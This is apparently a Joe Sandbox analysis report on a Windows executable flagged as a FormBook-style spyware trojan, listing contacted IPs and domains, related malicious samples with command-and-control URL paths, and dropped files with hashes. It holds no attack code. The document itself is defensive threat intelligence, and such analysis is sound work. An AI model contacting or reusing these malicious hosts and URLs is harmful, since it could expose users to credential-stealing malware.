                                                                                                                    91.195.240.123
                                                                                                                    		www.lm2ue.usGermany
                                                                                                                    		47846SEDO-ASDEfalse
                                                                                                                    91.195.240.19
                                                                                                                    		parkingpage.namecheap.comGermany
                                                                                                                    		47846SEDO-ASDEfalse
                                                                                                                    70.32.23.111
                                                                                                                    		glissy.caUnited States
                                                                                                                    		55293A2HOSTINGUSfalse
                                                                                                                    89.35.125.17
                                                                                                                    		www.auetravel.kzRomania
                                                                                                                    		57495BSS-ONEROfalse
                                                                                                                    116.203.164.244
                                                                                                                    		www.wp-bits.onlineGermany
                                                                                                                    		24940HETZNER-ASDEfalse
                                                                                                                    185.135.132.99
                                                                                                                    		yekobie.comFrance
                                                                                                                    		16347RMI-FITECHFRfalse
                                                                                                                    35.213.232.35
                                                                                                                    		www.getgoodscrub.comUnited States
                                                                                                                    		19527GOOGLE-2USfalse
                                                                                                                    203.161.46.103
                                                                                                                    		www.selectif.xyzMalaysia
                                                                                                                    		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                                    47.76.62.167
                                                                                                                    		www.xn--yzyp76d.comUnited States
                                                                                                                    		9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse
                                                                                                                    213.36.252.182
                                                                                                                    		www.btpbox.comFrance
                                                                                                                    		12322PROXADFRfalse

                                                                                                                    General Information

                                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                    Analysis ID:1438237
                                                                                                                    Start date and time:2024-05-08 14:04:05 +02:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 10m 32s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:17
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:2
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:NdYuOgHbM9.exe
                                                                                                                    renamed because original name is a hash value
                                                                                                                    Original Sample Name:1bb742c209872385c5b456d066fccf141ab2405245953c135b36029a3dbd5bee.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.spyw.expl.evad.winEXE@17/11@15/14
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 75%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 87%
                                                                                                                    • Number of executed functions: 79
                                                                                                                    • Number of non-executed functions: 245
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                    Warnings

                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 13.89.179.12
                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                    Simulations

                                                                                                                    Behavior and APIs

                                                                                                                    TimeTypeDescription
                                                                                                                    14:04:53API Interceptor18x Sleep call for process: powershell.exe modified
                                                                                                                    14:05:08API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                    14:05:49API Interceptor10529527x Sleep call for process: sfc.exe modified

                                                                                                                    Joe Sandbox View / Context

                                                                                                                    IPs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    62.149.128.40SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.insertcoen.com/wu8v/
                                                                                                                    COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • www.insertcoen.com/wu8v/
                                                                                                                    purchase list.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.stnlab.net/0m8b/
                                                                                                                    Quote_Requests_data_and_profile.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                    • www.transizione50.net/nqpg/
                                                                                                                    YPtC8uu6px.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                    • www.stnlab.net/e0ff/?KRlDHViH=GggShjUc6jbqU8bV+A29JlUjIMK4gvEgXIK8EdExjI0+9dNyV48gSM6E3cunQl30BmA/M1VR+ww7FhWLUjfhQKd6slUx3hCddQ==&XTw0=ihiX7ruHB4
                                                                                                                    New_requests_and_profile.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                    • www.transizione50.net/nqpg/
                                                                                                                    RFQ_DATA_ALL_REQUIREMENTS.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                    • www.transizione50.net/nqpg/
                                                                                                                    List_of_Items.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • www.autoreediritto.com/nprd/?jj5pCB=Py9L3GHj+iqL3o6RN7oNQqVhfMThRX7KE1sp12gu88x2qwC+gcGiL7zcbfxcGJH9Bvawxm9O06CBswX8NRHUaUIL+2g3N32IFA==&Ov=wJ_L_jppUX9
                                                                                                                    S00989282313413.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.greenchronos.cloud/u9g7/?3v=3EfOV/qIjy0dgrhOIHfWy3SPMZ6h3HVQJMABsPvYBW2LkUdcGfig9RMIYH5GVOPPVtKpe9cUJHvEIYF9293T8mxjA2UAY8/v1g==&NZSpL=m0KTzVKxa0f
                                                                                                                    S00989282313413.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.greenchronos.cloud/u9g7/?_V7=3EfOV/qIjy0dgrhJUXeL0k7XTLuthQ5QJMABsPvYBW2LkUdcGfig9RMIYH5GVOPPVtKpe9cUJHvEIYF9293Wn0hzEFsIJuDG0w==&Cxcl=02bLI
                                                                                                                    208.112.85.150COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • www.fivetownsjcc.com/wu8v/
                                                                                                                    137.220.252.40SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.387mfyr.sbs/wu8v/
                                                                                                                    COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • www.387mfyr.sbs/wu8v/
                                                                                                                    BM-FM_NR.24040718PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • www.387mfyr.sbs/8cgp/
                                                                                                                    38.63.111.149SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.rltattoo.com/wu8v/
                                                                                                                    SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.rltattoo.com/wu8v/

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    parkingpage.namecheap.com5HR6GXEamJ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • 91.195.240.19
                                                                                                                    Fyge206.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • 91.195.240.19
                                                                                                                    Order confirmation F20 - 011 PURCHASE ORDER.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 91.195.240.19
                                                                                                                    RE Draft BL for BK#440019497 REF#388855.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 91.195.240.19
                                                                                                                    kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 91.195.240.19
                                                                                                                    SARAY_RECEIPT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • 91.195.240.19
                                                                                                                    Dagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • 91.195.240.19
                                                                                                                    Demand G2-2024.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                    • 91.195.240.19
                                                                                                                    Inv 070324.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 91.195.240.19
                                                                                                                    Lowe_list0605002024.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • 91.195.240.19
                                                                                                                    www.lm2ue.usDagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • 91.195.240.123
                                                                                                                    SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 91.195.240.123
                                                                                                                    00389692222221902.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • 91.195.240.123
                                                                                                                    Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • 91.195.240.123
                                                                                                                    COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 91.195.240.123
                                                                                                                    BM-FM_NR.24040718PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • 91.195.240.123
                                                                                                                    www.selectif.xyzSecuriteInfo.com.Win64.PWSX-gen.27230.12502.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 203.161.46.103
                                                                                                                    SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 203.161.46.103
                                                                                                                    COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 203.161.46.103
                                                                                                                    www.auetravel.kzFyge206.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • 89.35.125.17
                                                                                                                    SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 89.35.125.17
                                                                                                                    SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 89.35.125.17
                                                                                                                    COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 89.35.125.17
                                                                                                                    www.rltattoo.comSecuriteInfo.com.Win64.PWSX-gen.27230.12502.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 38.63.111.149
                                                                                                                    SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 38.63.111.149
                                                                                                                    COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 38.63.111.149

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    LNH-INCUSDagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • 208.112.85.150
                                                                                                                    SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 208.112.85.150
                                                                                                                    SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 208.112.85.150
                                                                                                                    Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • 208.112.85.150
                                                                                                                    COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 208.112.85.150
                                                                                                                    FewiVGKGLr.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                    • 209.164.3.248
                                                                                                                    MdC5YZWIHc.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 204.12.98.95
                                                                                                                    ci5DCnYEL1.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 204.12.25.8
                                                                                                                    QGN4hQprkC.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 208.112.153.128
                                                                                                                    KDV0aqMN8z.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                    • 209.216.53.149
                                                                                                                    COGENT-174USuzFrAkagaX.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                    • 50.7.187.218
                                                                                                                    Condition-Agreement_2024_05_06_11.lnkGet hashmaliciousBumbleBeeBrowse
                                                                                                                    • 38.180.93.26
                                                                                                                    Condition-Agreement_2024_05_06_48.lnkGet hashmaliciousBumbleBeeBrowse
                                                                                                                    • 38.180.93.26
                                                                                                                    Condition-Agreement_2024_05_06_27.lnkGet hashmaliciousBumbleBeeBrowse
                                                                                                                    • 38.180.93.26
                                                                                                                    Condition-Agreement_2024_05_06_39.lnkGet hashmaliciousBumbleBeeBrowse
                                                                                                                    • 38.180.93.26
                                                                                                                    Condition-Agreement_2024_05_06_12.lnkGet hashmaliciousBumbleBeeBrowse
                                                                                                                    • 38.180.93.26
                                                                                                                    Condition-Agreement_2024_05_06_22.lnkGet hashmaliciousBumbleBeeBrowse
                                                                                                                    • 38.180.93.26
                                                                                                                    Condition-Agreement_2024_05_06_30.lnkGet hashmaliciousBumbleBeeBrowse
                                                                                                                    • 38.180.93.26
                                                                                                                    Condition-Agreement_2024_05_06_46.lnkGet hashmaliciousBumbleBeeBrowse
                                                                                                                    • 38.180.93.26
                                                                                                                    Condition-Agreement_2024_05_06_17.lnkGet hashmaliciousBumbleBeeBrowse
                                                                                                                    • 38.180.93.26
                                                                                                                    BCPL-SGBGPNETGlobalASNSGpayment-order90094983.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 202.79.175.217
                                                                                                                    https://www.accapp.accoutenneoaer.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 192.253.238.4
                                                                                                                    https://accapp.accoutenneoaer.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 192.253.238.4
                                                                                                                    SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 137.220.252.40
                                                                                                                    AKQlHV2OJ0aENUv.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 118.107.45.77
                                                                                                                    https://cpierceworld.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 118.107.57.100
                                                                                                                    https://zieonlineshop.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 118.107.57.100
                                                                                                                    https://lewellensiding.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 118.107.57.100
                                                                                                                    https://simontatum.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 118.107.57.100
                                                                                                                    https://bonustiaphari.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 118.107.57.100
                                                                                                                    ARUBA-ASNITSecuriteInfo.com.Win64.PWSX-gen.27230.12502.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 62.149.128.40
                                                                                                                    http://www.babeleye.comGet hashmaliciousUnknownBrowse
                                                                                                                    • 89.46.110.65
                                                                                                                    COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 62.149.128.40
                                                                                                                    spQm3NLQtH.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 212.237.24.93
                                                                                                                    4NnBaAMXoc.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                                                    • 94.177.220.114
                                                                                                                    8dToMPcvO1.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 95.110.130.114
                                                                                                                    FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                    • 89.46.106.29
                                                                                                                    #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkGet hashmaliciousUnknownBrowse
                                                                                                                    • 89.46.106.29
                                                                                                                    2x6j7GSmbu.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 62.149.189.71
                                                                                                                    EYhvUxUIsT.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 95.110.130.125

                                                                                                                    JA3 Fingerprints

                                                                                                                    No context

                                                                                                                    Dropped Files

                                                                                                                    No context

                                                                                                                    Created / dropped Files

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NdYuOgHbM9.exe_cb4f28724ab14918bd9bedf768381bc8ce9e286_913d62bf_baabcbcc-6ae4-49e3-af14-5f7377e55c85\Report.wer

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):65536
                                                                                                                    Entropy (8bit):1.165425106552101
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:6j3AsPKk50UnUdaWBNTSAQmIdzuiFkZ24lO87aDTg:mTP0UnUdamNeEIzuiFkY4lO8W3g
                                                                                                                    MD5:0B7E95B110881E45234788DD9671A5CF
                                                                                                                    SHA1:C7C975835AEC0E34B54C4906CD5C0EB4F507B8D2
                                                                                                                    SHA-256:37470BFF0D56A13E93BDC5E7D5733425F7CBCD24E543006DEC8931B05BD73411
                                                                                                                    SHA-512:2B757C4BC932F3513991542A307A8CD3EA9545DEF2A1F88CCF3CFB2789DAE628E1BA799B580F981EF23CFC4DA06E91DA28B77C584C15E48F806DE4F49579B981
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.6.4.3.4.9.3.3.1.9.3.4.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.6.4.3.4.9.4.1.7.8.7.4.8.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.a.b.c.b.c.c.-.6.a.e.4.-.4.9.e.3.-.a.f.1.4.-.5.f.7.3.7.7.e.5.5.c.8.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.3.a.a.5.6.c.-.7.2.f.3.-.4.4.6.d.-.b.8.c.7.-.c.2.8.3.9.c.6.b.7.2.9.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.N.d.Y.u.O.g.H.b.M.9...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.t.e.d.a.z.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.0.c.-.0.0.0.1.-.0.0.1.4.-.c.1.0.0.-.6.8.e.d.3.f.a.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.f.c.a.0.f.c.f.9.1.4.7.e.2.a.e.6.6.a.7.3.5.f.b.c.9.5.7.0.b.7.0.0.0.0.0.0.0.0.0.!.0.0.0.0.3.d.f.c.e.1.9.1.7.2.9.1.f.f.7.8.5.1.3.d.b.a.8.4.e.8.a.c.7.1.5.7.0.0.d.8.1.4.d.7.!.N.d.Y.u.O.g.H.b.M.9...e.x.e...

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER943D.tmp.dmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                    File Type:Mini DuMP crash report, 16 streams, Wed May 8 12:04:53 2024, 0x1205a4 type
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512114
                                                                                                                    Entropy (8bit):3.228805618738123
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:AORD515Gl26UXHu6CLti64dcSGdT+381CCqmFTW923+vmFm78xPVx4SIXi:AoV15cZTg/iq383QQm785
                                                                                                                    MD5:D83492A261E7E334025D118F0741C4D3
                                                                                                                    SHA1:99B17571337197C2E78ECDD0AAD289A065B93E5E
                                                                                                                    SHA-256:B1562B97C358DA297CE70108FC8C52424B2483E75823D446D9974853B7674B92
                                                                                                                    SHA-512:93A755A4E565F1D7CD44FF43E8D0951D0F195F5ECDFCB247AC223311B8A5C84186D49415AF4FEB3C30832378B2378CAD1E133B07488F33CB5DCCF6FE3B0B86A9
                                                                                                                    Malicious:false
                                                                                                                    Preview:MDMP..a..... .......ej;f....................................$....%...........%......DO.............l.......8...........T...........X:...............B...........D..............................................................................eJ......<E......Lw......................T...........aj;f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER9670.tmp.WERInternalMetadata.xml

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8608
                                                                                                                    Entropy (8bit):3.710577774303289
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:R6l7wVeJlf/c6Y9iLxPNVgmfK76Jipr089baxsfJem:R6lXJNE6YSxPNVgmfci2aqfp
                                                                                                                    MD5:BE788CF859584FD6B8018707AD124928
                                                                                                                    SHA1:912F098C6FD1595E82CA44419058C85521B019F7
                                                                                                                    SHA-256:43977FA82E8DC70E13549916FD321AF7AF11CF67F3684E7F51AD964C4A7A607B
                                                                                                                    SHA-512:6FC13DF5EC3C122F66E33279C451A6DE8DF5841063D940A4DF44D6FF96832ACD82899E5359350073EF7D60AACB0112201E35D6E925A3D2EDDD2C15CD3F921AA7
                                                                                                                    Malicious:false
                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.6.0.<./.P.i.

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER96A0.tmp.xml

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4759
                                                                                                                    Entropy (8bit):4.524400457115686
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:cvIwWl8zs0Jg771I9JGWpW8VY1Ym8M4JT0AFjyq85rkh6lzk6ed:uIjfyI7iH7VJJTDFh6lI6ed
                                                                                                                    MD5:DCF33ED1FB37D7C3C80464CDF45C3DD7
                                                                                                                    SHA1:A06844C1E119A50FE9418F2B99315FD20E207747
                                                                                                                    SHA-256:6B48AEC1B256567FF8A79B778A46C7E6A0BB9623D8B6DE0E7AF366016DA382DB
                                                                                                                    SHA-512:57954BC5669A999020D0F3249D512F9259761DF37BCCBCE86D6813D167CAA05EB2BA8D1F4494832C33833ABBB11B1C6001300791102CE5BBE4E26F41BC56FEC8
                                                                                                                    Malicious:false
                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="314107" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):64
                                                                                                                    Entropy (8bit):1.1940658735648508
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Nlllul3nqth:NllUa
                                                                                                                    MD5:851531B4FD612B0BC7891B3F401A478F
                                                                                                                    SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                                                                    SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                                                                    SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                                                                    Malicious:false
                                                                                                                    Preview:@...e.................................&..............@..........

                                                                                                                    C:\Users\user\AppData\Local\Temp\5HG1921

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\sfc.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):114688
                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                    Malicious:false
                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlbw15ex.j3e.ps1

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
